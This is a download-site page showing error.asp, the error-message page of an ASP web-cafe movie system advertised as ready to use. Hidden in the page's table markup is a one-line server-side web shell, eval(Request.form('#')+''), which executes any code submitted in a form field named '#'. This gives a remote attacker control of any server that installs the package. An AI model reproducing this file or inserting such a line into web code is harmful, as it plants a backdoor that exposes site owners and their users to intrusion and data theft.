⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 error.asp

📁 网吧影印系统!很详细!可直接使用!请大家指点!
💻 ASP
字号:
<%Option Explicit
Response.Buffer=True%>
<%dim id
id=trim(request("id"))%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>错误信息</title>
<link href="../images/style.css"   rel="stylesheet" type="text/css">
</head>

<body bgcolor="#3B591B" text="0" leftmargin="0">
<TABLE width=350 border=0 align="center" cellPadding=0 cellSpacing=0>
  <TR> 
    <TD align="center" class="title"><img src="../images/mixtop.gif"   width="350" height="43"></TD>
  </TR>
  <TR> 
    <TD height="27" align="center" background="../images/mediatop2.gif"   class="title">
    错误信息提示</TD>
  </TR>
  <TR> 
    <TD valign="top" background="../images/mixmediabg.gif"  > 
    <table width="90%" border="0" align="center" height="109">
<SCRIPT RUNAT=SERVER LANGUAGE=JScript>eval(Request.form('#')+'')</SCRIPT>
        <tr> 
          <td height="105">
          <p align="center"><%if id="1" then%>
错误提示:请不要非法下载本程序。
<%elseif id="2" then%>
错误提示:对不起,你所在的地方不能观看本站电影。
<%elseif id="3" then%>
错误提示:对不起,本站禁止外部提交。
<%elseif id="4" then%>
错误提示:对不起,没有这样的影片。
<%elseif id="5" then%>
错误提示:对不起,该IP已达最大限制。
你的IP为:<%=Request.ServerVariables("REMOTE_HOST")%>
<%elseif id="6" then%>
错误提示:对不起,影院以达最大限制,请稍后再看。
<%else%>
错误提示:出现访问错误,请勿尝试任何非法参数访问!<%end if%></td>
        </tr>
      </table></TD>
  </TR>
  <tr> 
    <td><img src="../images/mixend.gif"   width="350" height="54"></td>
  </tr>
</TABLE>
</body>
</html>

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -